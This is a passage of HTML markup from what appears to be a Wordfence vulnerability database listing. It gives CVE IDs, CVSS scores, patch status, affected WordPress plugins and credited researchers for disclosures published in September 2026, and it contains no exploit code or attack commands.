<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81789" target="_blank" rel="noopener noreferrer">							CVE-2026-81789						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-product-fields-for-woocommerce-extended" target="_blank" rel="noopener">Advanced Product Fields Extended for WooCommerce</a> <span class="wfvr-software-slug">[advanced-product-fields-for-woocommerce-extended]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/maarten" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cdd8ad43839b3daf1946313906d03f15.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cdd8ad43839b3daf1946313906d03f15"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/maarten" target="_blank" rel="noopener">Maarten</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d430c863-6af1-4519-b276-3bf7e2b2d3c2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43fbc5df-dd8c-4a1d-92e9-5f3881cfb2e0" target="_blank" rel="noopener">CryptoPayment Gateway 1.2.1 &#8211; 1.2.2 &#8211; Unauthenticated Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81648" target="_blank" rel="noopener noreferrer">							CVE-2026-81648						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptopayment-gateway" target="_blank" rel="noopener">CryptoPayment Gateway</a> <span class="wfvr-software-slug">[cryptopayment-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43fbc5df-dd8c-4a1d-92e9-5f3881cfb2e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9c1d8ec3-de01-4496-8d8b-b9604f952b1e" target="_blank" rel="noopener">FireBox &lt;= 3.1.10 &#8211; Authenticated (Author+) Remote Code Execution to Privilege Escalation</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76801" target="_blank" rel="noopener noreferrer">							CVE-2026-76801						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/firebox" target="_blank" rel="noopener">FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment</a> <span class="wfvr-software-slug">[firebox]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9c1d8ec3-de01-4496-8d8b-b9604f952b1e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d916a62f-76b9-4e6c-8b7f-682d9ded542a" target="_blank" rel="noopener">Gpx2Graphics &lt;= 0.3 &#8211; Cross-Site Request Forgery to Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81090" target="_blank" rel="noopener noreferrer">							CVE-2026-81090						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gpx2graphics" target="_blank" rel="noopener">Gpx2Graphics</a> <span class="wfvr-software-slug">[gpx2graphics]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fd2bb32309c445d4b78303e1a770ded0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd2bb32309c445d4b78303e1a770ded0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener">Huynh Kien Minh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d916a62f-76b9-4e6c-8b7f-682d9ded542a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a215460-64ab-466e-a148-e510233cdcd6" target="_blank" rel="noopener">Insert or Embed Articulate Content into WordPress &lt; 4.3000000025 &#8211; Authenticated (Author+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2024-0757" target="_blank" rel="noopener noreferrer">							CVE-2024-0757						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-or-embed-articulate-content-into-wordpress" target="_blank" rel="noopener">Insert or Embed Articulate Content into WordPress</a> <span class="wfvr-software-slug">[insert-or-embed-articulate-content-into-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a215460-64ab-466e-a148-e510233cdcd6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1db28477-8982-4e47-b5ed-26fd211ee925" target="_blank" rel="noopener">Live Composer &lt;= 2.1.18 &#8211; Authenticated (Contributor+) PHP Object Injection via Shortcode</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16502" target="_blank" rel="noopener noreferrer">							CVE-2026-16502						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/live-composer-page-builder" target="_blank" rel="noopener">Live Composer – Free WordPress Website Builder</a> <span class="wfvr-software-slug">[live-composer-page-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1db28477-8982-4e47-b5ed-26fd211ee925" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba49bbf9-649b-456e-bab8-9f0f74bdbaee" target="_blank" rel="noopener">MemberPress Corporate Accounts &lt;= 1.5.39 &#8211; Authenticated (Subscriber+) Privilege Escalation via Mass Assignment in Sub-Account Creation</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15451" target="_blank" rel="noopener noreferrer">							CVE-2026-15451						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/memberpress-corporate" target="_blank" rel="noopener">MemberPress Corporate Accounts</a> <span class="wfvr-software-slug">[memberpress-corporate]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba49bbf9-649b-456e-bab8-9f0f74bdbaee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb07058-3781-4456-8595-2edf92ef391a" target="_blank" rel="noopener">RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress &lt;= 4.1224 &#8211; Authenticated (Subscriber+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81803" target="_blank" rel="noopener noreferrer">							CVE-2026-81803						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/computer-repair-shop" target="_blank" rel="noopener">RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress</a> <span class="wfvr-software-slug">[computer-repair-shop]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8cc4fa628b6308e7c5c94d3bb19b2cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8cc4fa628b6308e7c5c94d3bb19b2cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah" target="_blank" rel="noopener">Nasur ullah</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb07058-3781-4456-8595-2edf92ef391a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75e5c379-02a2-4f1e-b62f-e02087c8446b" target="_blank" rel="noopener">SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, &amp; Payments &lt; 4.6.3 &#8211; Authenticated (Subscriber+) Arbitrary Account Email Takeover</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18480" target="_blank" rel="noopener noreferrer">							CVE-2026-18480						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/surecart" target="_blank" rel="noopener">SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, &amp; Payments</a> <span class="wfvr-software-slug">[surecart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75e5c379-02a2-4f1e-b62f-e02087c8446b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0077d56-11e7-4e74-abe0-63e81db67be3" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.7 &#8211; Authenticated (Subscriber+) PHP Object Injection to Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78175" target="_blank" rel="noopener noreferrer">							CVE-2026-78175						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0077d56-11e7-4e74-abe0-63e81db67be3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee369c0-0d7c-4142-b3ba-a518288647ba" target="_blank" rel="noopener">Various Newfold Plugins Various Versions &#8211; Unauthenticated Authentication Bypass via Bearer Token Validation with Empty Secret</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80099" target="_blank" rel="noopener noreferrer">							CVE-2026-80099						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-module-data" target="_blank" rel="noopener">WP Module Data</a> <span class="wfvr-software-slug">[wp-module-data]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bluehost-wordpress-plugin" target="_blank" rel="noopener">WP Plugin Bluehost</a> <span class="wfvr-software-slug">[bluehost-wordpress-plugin]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-crazy-domains" target="_blank" rel="noopener">WP Plugin Crazy Domains</a> <span class="wfvr-software-slug">[wp-plugin-crazy-domains]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-hostgator" target="_blank" rel="noopener">WP Plugin Hostgator</a> <span class="wfvr-software-slug">[wp-plugin-hostgator]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-web" target="_blank" rel="noopener">WP Plugin Web</a> <span class="wfvr-software-slug">[wp-plugin-web]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorin-vasile" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f5eda53e33510f9c9058aa73135ae3a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f5eda53e33510f9c9058aa73135ae3a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sorin-vasile" target="_blank" rel="noopener">sorin vasile</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ee369c0-0d7c-4142-b3ba-a518288647ba" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48660afe-1e03-4bf5-b821-6538a4daf201" target="_blank" rel="noopener">YITH WooCommerce Waitlist Premium &lt;= 3.35.0 &#8211; Authenticated (Subscriber+) Privilege Escalation to Admin via wp_ajax_yith_wcwtl_add_user</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14359" target="_blank" rel="noopener noreferrer">							CVE-2026-14359						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yith-woocommerce-waiting-list-premium" target="_blank" rel="noopener">YITH WooCommerce Waitlist Premium</a> <span class="wfvr-software-slug">[yith-woocommerce-waiting-list-premium]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michele-genito" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3582a1289bcb5d25fed1a2d8d4b55187.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3582a1289bcb5d25fed1a2d8d4b55187"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/michele-genito" target="_blank" rel="noopener">Michele Genito</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48660afe-1e03-4bf5-b821-6538a4daf201" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53366256-66a8-4c91-91f9-100c7a397b7b" target="_blank" rel="noopener">CODE MONKEYS PROPOSALS – Easily create client proposals from your WordPress admin dashboard &lt;= 1.0.1 &#8211; Authenticated (Subscriber+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77005" target="_blank" rel="noopener noreferrer">							CVE-2026-77005						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/code-monkeys-proposals" target="_blank" rel="noopener">CODE MONKEYS PROPOSALS – Easily create client proposals from your WordPress admin dashboard</a> <span class="wfvr-software-slug">[code-monkeys-proposals]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53366256-66a8-4c91-91f9-100c7a397b7b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a671a264-81f6-4856-b48c-78f417e4ea0b" target="_blank" rel="noopener">Everest Forms – Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder with AI &lt;= 3.6.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
